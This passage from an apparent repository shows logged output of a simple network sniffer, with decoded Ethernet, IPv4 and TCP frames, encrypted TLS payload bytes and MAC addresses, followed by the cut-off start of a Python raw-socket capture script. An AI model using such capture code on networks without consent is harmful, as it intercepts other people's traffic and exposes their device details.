\xb3\xdc\xb3\xae\x9b\x2d\x40\xd2\xd7\x9b\x2f\x6f\x12\x5f\x5d\x51\x63\x93\x33 557 | \x91\x4f\x15\xc7\xed\xf1\x3f\x55\x59\x31\xc4\x79\xf9\xb7\x84\xe0\x28\x12\xa5 558 | \x12\x9f\xa6\xfb\xff\x4b\x0c\xd8\xba\x22\x74\x84\x0e\x15\x76\xed\x2a\xff\x04 559 | \x56\xd4\xec\xb6\x01\x90\x97\x65\xf2\x42\xfe\x98\xa7\x4e\x65\x4e\xe7\x7b\x77 560 | \xf1\x36\x89\xdf\x34\x43\xb9\x36\xe5\xc2\x80\x38\x91\xa0\xe9\x3b\x43\x6f\x7f 561 | \x64\x89\x7a\xa2\xc6\xb7\x05\xd7\xb5\xf6\x1b\x8b\xbf\x5c\xab\xff\x36\xf0\x1a 562 | \x8e\x51\x7b\xef\x98\x48\x1b\x48\xbd\xee\x55\xb7\xf5\x90\x3b\xfe\xb0\xfd\xaf 563 | \x00\x60\xa9\x9b\x19\x89\xd7\x1c\x43\xc8\x9f\x68\xd6\xb1\x45\x00\x2f\x6a\x5e 564 | \x88\xaf\x50\xfd\xce\x54\x2e\xb0\xa2\x38\xb5\xa9\x1e\x99\xad\x9d\x82\x43\xd0 565 | \xcc\xaa\x3e\xa6\x65\x48\x48\xf3\xb2\x64\xbd\xf2\x99\x93\x16\x3c\x1b\x7b\x94 566 | \x50\x70\x92\x6e\x5c\x1a\x03\xcf\xb8\x2d\x19\xc0\xae\x7c\x95\xde\x44\xbb\xf7 567 | \x88\xd3\xed\x48\x0b\x85\x35\xf8\xe5\xc7\x15\xdc\xdf\xeb\xe6\x16\x71\xd2\x10 568 | \x14\xac\xcf\x1f\xca\xf9\x98\x62\x3c\xb6\xe2\x8f\xd3\x53\xa9\x87\x30\x17\xd8 569 | \xc3\x03\x83\x63\xa9\x6c\xa1\x8d\x86\x9b\xb3\x6b\xa4\xac\x98\x12\x7a\x2c\x1f 570 | \x0e\x51\x88\xba\x4b\x50\xd3\x04\xbe\xe2\x5d\x89\xa3\x42\x4c\x70\x79\x5a\x66 571 | \xef\x63\x37\x46\xae\x9b\x74\xfb\x0d\xc7\x6e\xcc\x4e\x7a\xba\x45\x03\x2e\x9a 572 | \x88\xd1\x34\x6f\x9a\x56\x14\x4e\xf2\x06\x6c\x12\x60\x8b\x36\xac\x6f\x9b\xfd 573 | \x01\xb3\x56\xcc\x14\x7d\xec\xb6\xb9\x2a\x88\x9c\x80\xd4\x97\xb1\x6a\x83\x1e 574 | \xfb\x8a\xec\x7e\xc8\x54\x70\x28\x9e\x6a\x41\x5e\xe2\x28\x93\x2d\x40\xbb\x9b 575 | \x95\xdc\xbb\x41\x12\x90\x78\x11\xed\xe7\x8f\x08\x64\x9f\xf4\xfb\xb9\x24\xfe 576 | \x6d\xcc\x8b\x19\xbe\xa6\x64\xb2\x2c\x46\x89\xb4\x62\xa2\xa4\xbb\x85\xc0\xe9 577 | \xdf\x00\x0d\x39\x1c\xe3\xf5\x60\x93\x85\xbf\xec\x5c\x5f\x50\x26\xca\xd5\x03 578 | \xdc\xc6\x1b\x36\x7c\xdf\x3c\xe4\x65\xe9\x29\xf3\x23\x40\x92\xe6\xda\xc2\xec 579 | \x1b\xd3\xe1\xe5\x3b\xf0\x4e\xff\x88\x6c\x96\x10\x13\xcb\xdc\x4c\x5a\xfb\x48 580 | \xd5\x23\x73\x85\x5f\x2e\x32\x63\xb6\xd5\x9a\xea\x8d\xc4\x73\xdb\x92\x5b\x14 581 | \x40\xe7\xbc\x42\x8b\x64\x88\xe9\xc6\xbe\x0d\xa9\x8e\xc1\x72\x2c\x8d\xe8\x5c 582 | \xff\x33\x33\xd7\xaf\x49\x5b\x2d\xff\x77\xfb\x01\xcc\x40\x34\xf4\x2b\xe2\x7b 583 | \xe3\xda\xec\xac\x18\x63\x2c\x62\xfc\xad\x6f\x01\x89\x5f\xae\x8f\xe2\x05\xf9 584 | \x75\xda\x72\xc1\x36\x60\xd7\x88\xa0\x4e\xe6\x9b\x9e\x6c\xe6\xb0\x2f\x93\x74 585 | \x84\x7a\x34\x5d\x70\xaf\x7c\x50\x01\xa7\xec\xfb\x34\x45\x31\x12\x3b\xa8\x4c 586 | \xc9\xec\xda\xee\xd4\xc8\xc0\x07\xd9\xe4\x75\x98\x52\x9c\x8a\x0b\xae\x99\xee 587 | \xa8\xdb\xf5\x7c\x84\x65\x12\x14\x19\x62\x79\x69\xa5\x09\x6c\x75\x96\xc1\xd1 588 | \xa5\x43\x96\xbd\xe3\x4c\x12\xa1\x64\xd6\x73\x1f\xa9\xfa\x9c\xea\x84\x64\x06 589 | \xc1\x39\xfc\xc4\xd4\x84\x52\x13\x2e\xbc\x17\x3a\xb7\x39\xed\xff\x54\xb4\x59 590 | \xc2\xb3\x45\xab\x5a\xc0\x43\xc0\xe3\xd6\xda\xbb\xa5\x7c\x6f\x47\x70\x7e\xe2 591 | \xd4\xd3\x67\x86\x96\x8e\x3b\xaf\x9b\x77\x13\x20\x5d\x62\x2f\xe1\x40\xb8\x03 592 | \x76\xd7\x7a\x46 593 | 594 | Ethernet Frame: 595 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 596 | - IPv4 Packet: 597 | - Version: 4, Header Length: 20, TTL: 64, 598 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 599 | - TCP Packet: 600 | - Source Port: 43360, Destination Port: 443 601 | - Sequence: 3702875526, Acknowledgement: 455481851 602 | - Flags: 603 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 604 | - Data: 605 | 606 | 607 | Ethernet Frame: 608 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 609 | - IPv4 Packet: 610 | - Version: 4, Header Length: 20, TTL: 59, 611 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 612 | - TCP Packet: 613 | - Source Port: 443, Destination Port: 43360 614 | - Sequence: 455481851, Acknowledgement: 3702875526 615 | - Flags: 616 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 617 | - Data: 618 | \x17\x03\x03\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x2f\x8c\x00\xeb\x35\x47\x53 619 | \x39\x81\xba\x8f\xe0\x89\xfe\x36\x7e\x7c\xdc\xd8\x58\x03\x8b\x8c\xf9\xae\xdc 620 | \xc4\x11\x65\x95\xa7\x85\x09\x15\xcf\x9c\x1c\xf9\x0a\x6b\xdb\x3f\x62\xc7\xae 621 | \xbc\x77\x51\x3d\xdd\x52\x5e\xe3\x0b\x56\x97\x88\x51\x81\xc8\x8d\xe2\x7e\x83 622 | \x3e\x07\xaf\x5b\x2d\xd9\x0f\xd0\xf4\x51\xc7\xa3\x7b\x2f\xfc\xef\xfc\x08\x72 623 | \x91\x57\xd7\x7c\xa3\x83\x1e\xed\x45\xa0\x83\x01\xaa\x2e\x61\x36\xab\x22\x56 624 | \x48\xdf\xce\x19\xc8\xbf\x7c\x27\x2c\x88\x90\xa7\x96\x72\x77\xef\x54\x40 625 | 626 | Ethernet Frame: 627 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 628 | - IPv4 Packet: 629 | - Version: 4, Header Length: 20, TTL: 64, 630 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 631 | - TCP Packet: 632 | - Source Port: 43360, Destination Port: 443 633 | - Sequence: 3702875526, Acknowledgement: 455481983 634 | - Flags: 635 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 636 | - Data: 637 | 638 | 639 | Ethernet Frame: 640 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 641 | - IPv4 Packet: 642 | - Version: 4, Header Length: 20, TTL: 59, 643 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 644 | - TCP Packet: 645 | - Source Port: 443, Destination Port: 43360 646 | - Sequence: 455481983, Acknowledgement: 3702875526 647 | - Flags: 648 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 649 | - Data: 650 | \x17\x03\x03\x00\xb0\x00\x00\x00\x00\x00\x00\x00\x30\x95\xde\x83\x96\xa2\x4c 651 | \x4f\x67\x24\x82\x04\xd3\x0d\x3b\x56\xb7\x74\x38\x07\x33\xfe\xf6\x3f\x2d\x17 652 | \xd8\xe2\xcc\x7b\x0f\x25\x15\xac\xbc\x75\x08\xc6\xa1\x13\xdc\xe3\x36\x22\xdf 653 | \x2b\xed\x73\x16\x97\xe2\x46\xab\x08\xb1\x1e\xd3\xde\x09\x56\xd8\x7f\x6c\x2e 654 | \x39\xa6\xee\x7f\xd5\xc1\xac\xbc\xe2\xdc\x73\xae\x64\x1a\x72\x6d\x8e\x29\xbe 655 | \x1a\x02\x4e\x8e\x09\x29\xd2\xb4\x51\x8f\x8d\x7d\xf3\xc3\x2d\x30\xb7\x1c\x0a 656 | \xd3\x77\x92\x7a\x15\x61\x62\x61\x25\x44\x22\x37\xef\x5d\xbe\xac\xdf\x2d\x37 657 | \x3d\x8c\xc4\x2f\x85\xc7\x8a\x16\x3e\x36\xa4\xa0\x9c\x66\x32\x95\x0b\x25\x41 658 | \xba\x5b\x80\xce\xef\x3c\x15\x84\xea\xd7\xd7\x16\x5f\x72\x9f\xa3\x8f\x84\x42 659 | \xe7\x76\x87\xfd\xbe\xcd\xd6\xe2\xcc\x20 660 | 661 | Ethernet Frame: 662 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 663 | - IPv4 Packet: 664 | - Version: 4, Header Length: 20, TTL: 64, 665 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 666 | - TCP Packet: 667 | - Source Port: 43360, Destination Port: 443 668 | - Sequence: 3702875526, Acknowledgement: 455482164 669 | - Flags: 670 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 671 | - Data: 672 | 673 | 674 | Ethernet Frame: 675 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 676 | - IPv4 Packet: 677 | - Version: 4, Header Length: 20, TTL: 59, 678 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 679 | - TCP Packet: 680 | - Source Port: 443, Destination Port: 43360 681 | - Sequence: 455482164, Acknowledgement: 3702875526 682 | - Flags: 683 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 684 | - Data: 685 | \x17\x03\x03\x00\x29\x00\x00\x00\x00\x00\x00\x00\x31\xf1\x1e\x6a\xf2\xf2\xd8 686 | \xb1\xbb\x4b\xe8\xa5\xfc\xa2\x95\xa9\x0e\xb3\x17\x27\x28\x9b\x42\xdb\x6c\x95 687 | \x77\x81\x75\x51\x52\x7c\xaf\x2a 688 | 689 | Ethernet Frame: 690 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 691 | - IPv4 Packet: 692 | - Version: 4, Header Length: 20, TTL: 64, 693 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 694 | - TCP Packet: 695 | - Source Port: 43360, Destination Port: 443 696 | - Sequence: 3702875526, Acknowledgement: 455482210 697 | - Flags: 698 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 699 | - Data: 700 | 701 | 702 | Ethernet Frame: 703 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 704 | - IPv4 Packet: 705 | - Version: 4, Header Length: 20, TTL: 64, 706 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 707 | - TCP Packet: 708 | - Source Port: 43360, Destination Port: 443 709 | - Sequence: 3702875526, Acknowledgement: 455482210 710 | - Flags: 711 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 712 | - Data: 713 | \x17\x03\x03\x00\x29\x00\x00\x00\x00\x00\x00\x00\x1f\xef\x81\xe2\x94\xd0\x34 714 | \xac\x4f\xf8\x66\x4f\x48\x9e\x77\xfa\x74\x12\xa4\x19\x68\xe8\x6f\xbb\x86\x5e 715 | \xab\xc9\x47\x6f\x38\x12\x18\x54 716 | 717 | Ethernet Frame: 718 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 719 | - IPv4 Packet: 720 | - Version: 4, Header Length: 20, TTL: 56, 721 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 722 | - TCP Packet: 723 | - Source Port: 443, Destination Port: 49888 724 | - Sequence: 2995710931, Acknowledgement: 3703332511 725 | - Flags: 726 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 727 | - Data: 728 | 729 | 730 | Ethernet Frame: 731 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 732 | - IPv4 Packet: 733 | - Version: 4, Header Length: 20, TTL: 56, 734 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 735 | - TCP Packet: 736 | - Source Port: 443, Destination Port: 49888 737 | - Sequence: 2995710931, Acknowledgement: 3703332511 738 | - Flags: 739 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 740 | - Data: 741 | 742 | 743 | Ethernet Frame: 744 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 745 | - IPv4 Packet: 746 | - Version: 4, Header Length: 20, TTL: 59, 747 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 748 | - TCP Packet: 749 | - Source Port: 443, Destination Port: 43360 750 | - Sequence: 455482210, Acknowledgement: 3702875572 751 | - Flags: 752 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 753 | - Data: 754 | 755 | 756 | Ethernet Frame: 757 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 758 | - IPv4 Packet: 759 | - Version: 4, Header Length: 20, TTL: 56, 760 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 761 | - TCP Packet: 762 | - Source Port: 443, Destination Port: 49888 763 | - Sequence: 2995710931, Acknowledgement: 3703332511 764 | - Flags: 765 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 766 | - Data: 767 | \x17\x03\x03\x00\x32\x00\x00\x00\x00\x00\x00\x00\x3e\x89\x85\x0f\xd6\x74\xf7 768 | \xa2\xd0\xb0\xbc\x1f\x18\x71\x19\x1f\xd9\xde\xac\x29\x04\x71\x7e\x80\x6d\x91 769 | \xe0\xa3\xe4\x0d\x27\x78\xd5\xe4\x3c\xab\x32\x03\x15\xad\x82\xe0\x5e 770 | 771 | Ethernet Frame: 772 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 773 | - IPv4 Packet: 774 | - Version: 4, Header Length: 20, TTL: 56, 775 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 776 | - TCP Packet: 777 | - Source Port: 443, Destination Port: 49888 778 | - Sequence: 2995710986, Acknowledgement: 3703332511 779 | - Flags: 780 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 781 | - Data: 782 | \x17\x03\x03\x03\x12\x00\x00\x00\x00\x00\x00\x00\x3f\xaf\xbd\x94\xed\x10\xcd 783 | \x65\xed\x49\x9b\xbc\x40\x67\xf9\xae\x9b\xcf\x9c\xe7\xc5\xc0\x24\x74\x83\xd4 784 | \x00\xe2\xcc\x04\x00\x42\xe8\xde\xd9\xba\x8e\xe3\xca\xb6\xb6\x74\x2d\x10\x98 785 | \xff\x5b\xbf\xc4\x42\xc7\xf5\x18\xe5\x04\x2e\xfc\x09\x8f\x5a\xc3\xa1\x6f\x8f 786 | \x7e\x91\xd3\x31\xef\xd5\x5c\xd8\xc8\x6f\xb2\xc8\x9c\x4c\xd3\xf1\xb5\x34\x2f 787 | \xb4\xae\xc1\x1c\xb8\xb5\xc1\x7f\xd4\xdc\xb7\x6d\xe8\x6f\x1c\x65\x54\xe1\x87 788 | \x92\xfb\x1f\x23\x70\x8f\xee\xaf\x03\xde\x02\xae\x07\x30\x37\x96\x83\x02\x1c 789 | \x1d\xda\x3b\x0d\xe4\x22\x8f\xc0\xe5\x5c\x91\x39\x1e\x7c\xbe\xdb\xeb\xc7\x75 790 | \xd1\x87\x6a\xbd\x88\x29\x4a\x8e\xc0\xa6\x63\x0e\xcf\x07\x90\x01\x80\xc9\x9f 791 | \xdc\x69\x79\xf6\xe4\x12\x34\xce\x50\xe1\x01\xbc\x0b\x76\x61\x40\x42\x08\xd3 792 | \xba\xd6\xa2\xa8\xfb\x23\x3f\x3e\x1a\xc5\xde\xae\x02\xf5\xd6\x08\xf0\x43\xab 793 | \x40\xdb\x50\x23\xf7\x83\x59\x06\x6b\xe7\xcc\x90\xaf\xc2\x6f\x6e\x1e\xfa\xbd 794 | \x6b\x0f\x0f\xd0\x23\x9f\xd8\x11\x7d\xf8\xfe\x9c\x19\x37\x90\xef\xb9\xc2\x47 795 | \x13\x72\x1d\x5b\x92\x54\xf9\xeb\x7e\xac\xbb\x1b\xb6\x99\x85\x9b\xab\x5d\x1a 796 | \x45\x57\x2b\xbd\xdb\x11\x5d\x24\x44\x36\x1f\xed\xab\xb2\x61\x2b\x4d\x35\x76 797 | \x67\x08\x34\x46\x0c\x6d\xc6\x78\x4a\xb1\x68\x6a\x13\xa3\x39\x34\xfe\xb5\x3c 798 | \x3f\x74\x0c\x21\x49\x37\xdb\xa3\x40\x2f\x7e\x78\x56\x43\xad\xab\xc3\x49\x54 799 | \x02\xff\xa9\xfa\x2a\xea\x14\x13\xca\x31\x25\x06\xdd\x75\x67\x0f\x34\x6c\xbf 800 | \xdc\x83\xa4\x42\x98\x38\xa5\xce\xfb\x04\x4a\x0e\xe5\xbf\x19\x62\x37\x2d\x74 801 | \x32\x02\x10\xa6\x02\xad\xd3\x9c\x05\x73\xd9\x23\xd5\xb8\xa6\x90\x3b\x93\x75 802 | \x00\xfd\x96\xb6\x0f\x04\x63\x24\x6b\x37\xe2\x17\x59\xfa\x09\x71\x99\x99\xe1 803 | \xc6\x94\xc3\x36\x9f\x4d\xd0\x02\xf7\x3c\xbb\x98\x2f\x68\x9f\x1e\xdc\xc0\xaf 804 | \x4d\xa9\x1e\x3d\xd6\xa1\x23\x1d\x35\x82\xe0\x4e\x99\x53\xd8\x10\x07\x7b\x2d 805 | \x83\x4f\x99\x35\xdc\xc0\x19\xd7\xc8\x40\xf6\x50\xbe\x04\x0f\x69\x5b\x55\x50 806 | \x25\xb8\xbc\x13\x91\x7f\xdd\x73\x4a\xb8\x7e\x7d\xb2\xbf\x1f\xeb\x59\x95\x36 807 | \x6e\x3c\x20\x3c\xc7\x6b\xbd\x56\xf8\x2a\xe3\x90\xcf\xb5\xec\xbb\xd5\x3b\x42 808 | \xf9\xb2\xef\x69\x8e\xbf\x79\x18\x4d\xc5\x3f\x62\x39\x50\x8b\x31\x3d\xd2\xf4 809 | \x2c\xd1\x65\xa7\x00\xd0\x55\xae\x18\xa7\x68\x6a\x47\x50\x45\x0e\x15\xbc\x55 810 | \x25\x5c\xfb\x04\xbd\x37\xe4\x22\xc0\xdf\x99\x09\x46\x6f\xa3\xc1\x36\x7b\x0d 811 | \x6d\x5a\x38\x3d\x2b\x62\x68\x20\x7c\xf0\xae\x86\xce\xa5\x23\x44\x7c\xce\xb2 812 | \xf8\x42\xe0\x27\xe2\xe0\xff\x7f\x17\xa9\x51\x42\xcb\xd5\x6a\x63\x00\x97\x6c 813 | \x89\xc0\xbe\x47\xbe\xde\x41\x86\xea\x3a\xa3\x51\xc4\x82\xb2\x93\xd3\x36\x61 814 | \x6c\x44\xe8\x73\x21\xc1\x45\xac\x90\x3f\x76\xde\xe6\x7f\x64\x23\x73\x12\x31 815 | \x0a\xc2\x6c\x13\x99\x7e\xa4\x1b\x4b\x74\x35\xc8\xfe\x79\xc8\x17\x5a\x8e\x95 816 | \x20\xc0\x67\x45\x0f\x99\x27\x7d\xec\xad\x5a\xca\xb7\x79\x22\xbe\x17\x92\x3e 817 | \x05\xd0\x96\x4a\x71\x3b\x09\x8b\xb9\xb0\xc1\xd0\x9e\x67\xa3\xa9\xcb\xa7\x49 818 | \xf0\x0d\xcc\x8a\x08\xbf\xaa\x3a\xc7\x08\x9f\x69\x32\x77\x15\xe5\x16\xec\x0d 819 | \x1f\x06\xcc\xb2\x6e\x03\x5e\xc5\xdd\x6a\x67\x9f\x71\xef\x60\xf8\xb4\xca\x78 820 | \xc3\x7a\xce\x1e\xb0\xb7\x8d\x49\x98\xc6\x89\x20\x87\x93\xc2\x6e\x28\x57\x03 821 | \xec\xed\xdc\x71\xef\x3a\xc0\x4e\x65\x28\x5a\x9a\xe5\x45\x13\x0a\x6f\xa0\x3c 822 | \x64\x44\xd0\x86\xc5\x84\x42\x47\x04\x04\xf2\xff\xd7\x42\xf1\xa9\x64\x8b\xe6 823 | \x59\xca\x24\x6d\x51\x95\xc8\xbb\x07\x23\x2e\xc9 824 | 825 | Ethernet Frame: 826 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 827 | - IPv4 Packet: 828 | - Version: 4, Header Length: 20, TTL: 56, 829 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 830 | - TCP Packet: 831 | - Source Port: 443, Destination Port: 49888 832 | - Sequence: 2995711777, Acknowledgement: 3703332511 833 | - Flags: 834 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 835 | - Data: 836 | \x17\x03\x03\x01\x20\x00\x00\x00\x00\x00\x00\x00\x40\x7e\x95\xff\xe9\x3f\x7d 837 | \x48\xd9\x48\x31\x46\x6e\x29\x16\x9f\xa0\xc5\xc6\x7a\x65\x6b\xa6\x0b\xd8\x2c 838 | \x16\x65\x2b\x5f\xa3\xe9\xbd\x21\xeb\x07\x34\x5a\xa5\x83\xa3\x3f\x85\xb0\xf0 839 | \xc0\xc6\xdf\x32\x75\x74\x78\x65\xec\xdb\xc8\xdf\xab\x65\xfc\x76\xf9\xf7\x46 840 | \x1a\x1c\xbb\x2e\x96\x7d\x85\xdd\x62\x3f\xb6\x5a\x98\xe3\xfc\x91\x5a\x11\xe5 841 | \xde\x88\xf8\x79\x9d\x57\x19\x16\x65\x6e\x96\x9d\x0e\x4a\xce\xa9\xfc\x55\xf1 842 | \x6f\xd9\x39\x36\xce\x7e\xd6\xe1\x26\xac\xbe\xca\xb0\xe9\x61\x8d\xd9\xe5\x10 843 | \x06\x68\x64\xf7\x22\x43\x37\xf5\x04\x6a\x4c\xe6\x2f\xbe\xd2\xa2\xdf\xde\xaa 844 | \xe0\x53\x9a\x02\x5d\x1c\x86\xbf\x5c\x1e\x90\x69\xbb\xd8\xe7\x82\xef\x39\x24 845 | \xad\x9d\x26\x7e\xac\x88\x74\x55\x33\xce\xd5\x5d\x9b\x87\xec\x64\x91\xd3\x8e 846 | \xc4\xc8\x56\x24\xc2\xc3\xac\x8d\x3f\x45\x7b\x59\x5a\xfa\x62\x89\x65\xdb\x29 847 | \x93\x6f\xc7\xe1\x89\x9f\xc4\xeb\xb1\x00\xb4\x0d\x02\x5f\xb0\x64\x5b\xf4\xb6 848 | \xcb\x24\x6d\xd7\x52\xf0\x19\x64\xbd\x65\x75\xe1\x35\x0c\xd5\x72\x3f\x0c\xfa 849 | \x2a\xd0\x98\xb4\xc0\x0a\x18\x78\xe7\x5c\x6b\x0b\x1f\x04\x5f\xdf\xda\x11\xb1 850 | \x50\x6a\xdd\x1d\xc9\x15\x7a\x3f\x99\xcd\xd1\x51\x32\xf6\xae\x47\xc8\xcb\x87 851 | \x92\xfe\xe4\x61\x15\x5e\xf5\xda 852 | 853 | Ethernet Frame: 854 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 855 | - IPv4 Packet: 856 | - Version: 4, Header Length: 20, TTL: 56, 857 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 858 | - TCP Packet: 859 | - Source Port: 443, Destination Port: 49888 860 | - Sequence: 2995712070, Acknowledgement: 3703332511 861 | - Flags: 862 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 863 | - Data: 864 | \x17\x03\x03\x00\x29\x00\x00\x00\x00\x00\x00\x00\x41\x74\x30\x5c\x3d\x48\x7d 865 | \x79\xe4\x9d\xa0\x2a\x76\x41\x45\x7a\xb0\x6a\x55\x17\x4f\x65\xaa\x6d\xc9\x17 866 | \x54\x9c\xef\x01\x83\x97\x2f\x84 867 | 868 | Ethernet Frame: 869 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 870 | - IPv4 Packet: 871 | - Version: 4, Header Length: 20, TTL: 64, 872 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.27.206 873 | - TCP Packet: 874 | - Source Port: 49888, Destination Port: 443 875 | - Sequence: 3703332511, Acknowledgement: 2995712116 876 | - Flags: 877 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 878 | - Data: 879 | 880 | 881 | Ethernet Frame: 882 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 883 | - IPv4 Packet: 884 | - Version: 4, Header Length: 20, TTL: 64, 885 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.27.206 886 | - TCP Packet: 887 | - Source Port: 49888, Destination Port: 443 888 | - Sequence: 3703332511, Acknowledgement: 2995712116 889 | - Flags: 890 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 891 | - Data: 892 | \x17\x03\x03\x00\x29\x00\x00\x00\x00\x00\x00\x00\x14\xdf\x1c\x86\x27\x3a\x5f 893 | \xa8\x35\x3b\x6c\xa3\x48\x15\xc0\x9b\xd3\xa4\xd6\xf9\xf3\xd2\x13\x01\xc2\x4b 894 | \x30\x0a\x26\x7b\x76\xb9\xa5\x91 895 | 896 | Ethernet Frame: 897 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 898 | - IPv4 Packet: 899 | - Version: 4, Header Length: 20, TTL: 56, 900 | - Protocol: 6, Source: 172.217.27.206, Target: 192.168.0.7 901 | - TCP Packet: 902 | - Source Port: 443, Destination Port: 49888 903 | - Sequence: 2995712116, Acknowledgement: 3703332557 904 | - Flags: 905 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 906 | - Data: 907 | 908 | 909 | Ethernet Frame: 910 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 911 | - IPv4 Packet: 912 | - Version: 4, Header Length: 20, TTL: 64, 913 | - Protocol: 6, Source: 192.168.0.7, Target: 202.88.147.145 914 | - TCP Packet: 915 | - Source Port: 54434, Destination Port: 443 916 | - Sequence: 4121927706, Acknowledgement: 942665370 917 | - Flags: 918 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 919 | - Data: 920 | 921 | 922 | Ethernet Frame: 923 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 924 | - IPv4 Packet: 925 | - Version: 4, Header Length: 20, TTL: 64, 926 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 927 | - TCP Packet: 928 | - Source Port: 43376, Destination Port: 443 929 | - Sequence: 3272384710, Acknowledgement: 1931158099 930 | - Flags: 931 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 932 | - Data: 933 | 934 | 935 | Ethernet Frame: 936 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 937 | - IPv4 Packet: 938 | - Version: 4, Header Length: 20, TTL: 59, 939 | - Protocol: 6, Source: 202.88.147.145, Target: 192.168.0.7 940 | - TCP Packet: 941 | - Source Port: 443, Destination Port: 54434 942 | - Sequence: 942665370, Acknowledgement: 4121927707 943 | - Flags: 944 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 945 | - Data: 946 | 947 | 948 | Ethernet Frame: 949 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 950 | - IPv4 Packet: 951 | - Version: 4, Header Length: 20, TTL: 59, 952 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 953 | - TCP Packet: 954 | - Source Port: 443, Destination Port: 43376 955 | - Sequence: 1931158099, Acknowledgement: 3272384711 956 | - Flags: 957 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 958 | - Data: 959 | 960 | -------------------------------------------------------------------------------- /Network-Sniffer/sniffer.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | import textwrap 4 | 5 | TAB_1 = '\t - ' 6 | TAB_2 = '\t\t - ' 7 | TAB_3 = '\t\t\t - ' 8 | TAB_4 = '\t\t\t\t - ' 9 | 10 | DATA_TAB_1 = '\t ' 11 | DATA_TAB_2 = '\t\t ' 12 | DATA_TAB_3 = '\t\t\t ' 13 | DATA_TAB_4 = '\t\t\t\t ' 14 | 15 | 16 | def main(): 17 | connection = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3)) 18 | 19 | while True: 20 | raw_data, address = connection.recvfrom(65536) 21 | dest_mac, src_mac, eth_protocol, data = 